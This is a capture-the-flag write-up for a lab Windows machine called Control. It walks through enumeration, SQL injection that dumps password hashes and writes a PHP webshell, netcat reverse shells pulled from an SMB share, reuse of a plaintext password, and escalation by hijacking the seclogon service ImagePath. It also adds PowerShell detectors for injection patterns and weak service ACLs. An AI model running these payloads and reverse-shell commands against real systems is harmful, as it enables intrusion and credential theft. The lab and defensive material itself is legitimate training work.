Control

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.167 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, the fastest of the nmap timing templates.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allPorts file.

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p80,135,3306,49666,49667 10.10.10.167 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into a file, in this case the targeted file.

The website shows a landing page with four buttons.

There is a comment in the source code of the main page with an IP address.

The Admin button redirects to admin.php, which complains that a header is missing.

Exploitation

We could try to brute-force the header name. Let's use wfuzz with a wordlist of HTTP header names, setting each one to the IP address we found in the source code.

wfuzz -c --hh=89 -t 200 -w /usr/share/seclists/Miscellaneous/web/http-request-headers/http-request-headers-fields-large.txt -H "FUZZ: 192.168.4.28" http://10.10.10.167/admin.php

The X-Forwarded-For header returns a 200 status code. Let's use Burp Suite as a proxy and inject this header into every request we make from our browser; configure it from Proxy > Proxy settings > Match and replace rules.

Now we have access to the admin page.

If we search for a product with a ' character, an SQL error appears, which means the site is probably vulnerable to SQL injection.

First, we need to know the number of columns of the current table. The following payload does not produce any error, so it has 6 columns.

p' order by 6-- -

Now, we could try to list the available databases.

p' union select schema_name,2,3,4,5,6 from information_schema.schemata-- -

One of the databases is mysql, whose user table usually has two columns called user and password. Let's retrieve the data of those columns.

p' union select user,password,3,4,5,6 from mysql.user-- -

We get password hashes for users root, manager and hector. We can try to break those with rainbow tables.

These credentials might be useful later. Let's try to get a shell on the system. First, check which database user our queries run as.

p' union select user(),2,3,4,5,6-- -

It is the manager user, which, as the following query shows, has the FILE privilege, so we can create files on the system.

p' union select grantee,privilege_type,is_grantable,4,5,6 from information_schema.user_privileges-- -

As the web server is running IIS 10.0, the website should be located in C:\inetpub\wwwroot\. Create a PHP webshell in that directory.

p' union select "<?php system($_GET[\'cmd\']);?>",2,3,4,5,6 into outfile "c:\inetpub\wwwroot\rce.php"-- -
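From the defender's side, both techniques used so far leave traces in the IIS logs: header brute-forcing shows up as a burst of requests from one client to admin.php, and the injection shows up as union select / into outfile in the query string. The following PowerShell is an added example, not part of the original writeup: the log lines are constructed, and the search.php endpoint and productName parameter are assumed names.

```powershell
# Added example, not from the writeup: constructed IIS log lines; search.php and productName are assumed.
$Burst = 1..60 | ForEach-Object {
    # 60 requests for admin.php from one client within about six seconds (header fuzzing)
    '2020-01-10 10:00:{0:D2} GET /admin.php - 10.10.14.11 403' -f [int]($_ / 10)
}
$Sqli = @(
    '2020-01-10 10:05:40 GET /search.php productName=p%27+union+select+user%2Cpassword%2C3%2C4%2C5%2C6+from+mysql.user--+- 10.10.14.11 200'
    '2020-01-10 10:06:05 GET /search.php productName=p%27+union+select+%22x%22%2C2%2C3%2C4%2C5%2C6+into+outfile+%22c%3A%5Cinetpub%5Cwwwroot%5Crce.php%22--+- 10.10.14.11 200'
)
$LogLines = @('#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status') + $Burst + $Sqli
function ConvertFrom-IisLog {
    param([string[]]$Lines)
    $fields = @()
    foreach ($line in $Lines) {
        # The #Fields directive names the columns; every later data line follows that layout
        if ($line -match '^#Fields:\s*(.+)$') { $fields = $Matches[1] -split '\s+'; continue }
        if ($line.StartsWith('#') -or -not $fields) { continue }
        $entry = [ordered]@{}
        $values = $line -split ' '
        for ($i = 0; $i -lt $fields.Count; $i++) { $entry[$fields[$i]] = $values[$i] }
        $entry.timestamp = [datetime]::ParseExact("$($entry.date) $($entry.time)", 'yyyy-MM-dd HH:mm:ss', [cultureinfo]::InvariantCulture)
        [pscustomobject]$entry
    }
}

function Find-SqlInjection {
    param([object[]]$Entries)
    foreach ($e in $Entries) {
        # Decode the query string the way the application would before matching
        $q = [uri]::UnescapeDataString(($e.'cs-uri-query' -replace '\+', ' '))
        if ($q -match 'union\s+select|information_schema|into\s+outfile') { [pscustomobject]@{ Client = $e.'c-ip'; Time = $e.timestamp; Query = $q } }
    }
}

function Find-RequestBurst {
    param([object[]]$Entries, [string]$Path, [int]$Threshold = 50, [int]$WindowSeconds = 10)
    foreach ($group in ($Entries | Where-Object { $_.'cs-uri-stem' -eq $Path } | Group-Object 'c-ip')) {
        $times = @($group.Group.timestamp | Sort-Object)
        # Burst: the Threshold-th request from this client lands inside the sliding window
        for ($i = 0; $i + $Threshold - 1 -lt $times.Count; $i++) {
            if (($times[$i + $Threshold - 1] - $times[$i]).TotalSeconds -lt $WindowSeconds) {
                [pscustomobject]@{ Client = $group.Name; Start = $times[$i]; Requests = $times.Count }
                break
            }
        }
    }
}
$entries = ConvertFrom-IisLog -Lines $LogLines
Find-SqlInjection -Entries $entries | Format-Table -AutoSize
Find-RequestBurst -Entries $entries -Path '/admin.php' | Format-Table -AutoSize
```

With the constructed input, Find-SqlInjection reports the two injection lines from 10.10.14.11 and Find-RequestBurst reports that client for 60 requests to /admin.php inside the 10-second window.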

Now, set a netcat listener on port 4444.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -p specify the port to listen on.

  • -n numeric-only IP, no DNS resolution.

Also start an SMB server sharing the directory where the nc.exe binary is located.

impacket-smbserver smbFolder $(pwd) -smb2support

Finally, send a reverse shell to our netcat listener and get a shell as nt authority\iusr.

curl "http://10.10.10.167/rce.php?cmd=\\10.10.14.11\smbFolder\nc.exe+-e+cmd+10.10.14.11+4444"

Privilege Escalation

As the following command shows, there is a local user called Hector.

net user

Hector is a member of the Remote Management Users group, so we could try to run commands as this user by creating a PSCredential object and using Invoke-Command with the credentials we obtained earlier.

powershell

hostname

$user = "Fidelity\hector"

$password = ConvertTo-SecureString 'l33th4x0rhector' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential($user, $password)

Invoke-Command -Credential $cred -ComputerName localhost -ScriptBlock { whoami }

As we can run commands as hector, let's get a reverse shell as him. First, set another netcat listener on port 5555.

rlwrap nc -lvnp 5555

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Then send the reverse shell using Invoke-Command. With a shell as hector we can grab the user flag.

Invoke-Command -Credential $cred -ComputerName localhost -ScriptBlock { \\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 5555 }

In the PowerShell history file there are a few interesting commands.

type \Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Let's open a PowerShell shell and inspect these commands. The first one lists the keys under CurrentControlSet, one of which is Services.

powershell

get-childitem HKLM:\SYSTEM\CurrentControlset | format-list

The second one lists ACLs of CurrentControlSet.

get-acl HKLM:\SYSTEM\CurrentControlSet | format-list

As this output looks a bit messy, we can view it in a more human-readable way.

$acl = get-acl HKLM:\SYSTEM\CurrentControlSet\Services

ConvertFrom-SddlString -Sddl $acl.Sddl | Foreach-Object {$_.DiscretionaryAcl}

As seen above, hector has full access over the Services key. To verify it, let's run winPEAS. Copy the binary to the directory shared by the SMB server and run it from the victim machine.

\\10.10.14.11\smbFolder\winPEASany.exe

There are a few services we could modify, but one of them, seclogon, runs with administrator privileges when it is started.

powershell (gp -path hklm:\system\currentcontrolset\services\seclogon).ObjectName

We need to change the ImagePath of the service. First, let's look at its current values.

reg query HKLM\System\CurrentControlSet\Services\seclogon

Change the ImagePath to the nc.exe binary on our local SMB server, so that it sends a reverse shell to our machine on port 6666.

reg add HKLM\System\CurrentControlSet\Services\seclogon /t REG_EXPAND_SZ /v ImagePath /d "\\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 6666" /f

Set another netcat listener on port 6666.

nc -lvnp 6666

As we can see, the service is stopped.

sc query seclogon

All we have to do is start the service to get a shell as nt authority\system and take the root flag.

sc start seclogon
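The whole escalation rests on one misconfiguration: a non-privileged principal holds write rights on a service key whose service runs as LocalSystem. The following PowerShell is an added example, not part of the original writeup, that audits every key under HKLM:\SYSTEM\CurrentControlSet\Services for exactly that condition; the list of trusted principals is an assumption and may need adjusting for a given host.

```powershell
# Added example, not from the writeup: audit service registry keys for write access held by
# principals other than the usual privileged ones. The trusted list below is an assumption.
function Get-WeakServiceKeyAcl {
    param(
        [string[]]$TrustedPrincipals = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                                         'NT SERVICE\TrustedInstaller', 'CREATOR OWNER')
    )
    # Rights that let a principal change ImagePath or take over the key; deliberately
    # excludes the ReadKey bits so that the normal read access of Users is not reported
    $writeMask = [int][System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership'
    foreach ($key in Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue) {
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        $props = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($TrustedPrincipals -contains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.RegistryRights -band $writeMask) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $key.PSChildName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                Inherited = $ace.IsInherited
                RunsAs    = $props.ObjectName
                ImagePath = $props.ImagePath
            }
        }
    }
}

# Highest impact first: a non-trusted principal can rewrite the key of a service that
# runs as LocalSystem, which is the seclogon situation described above
Get-WeakServiceKeyAcl |
    Where-Object { $_.RunsAs -eq 'LocalSystem' } |
    Sort-Object Service, Principal |
    Format-Table Service, Principal, Rights, ImagePath -AutoSize
```

On the box described here, this report would list seclogon with hector's full-control entry; on a healthy host the LocalSystem filter should return nothing.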
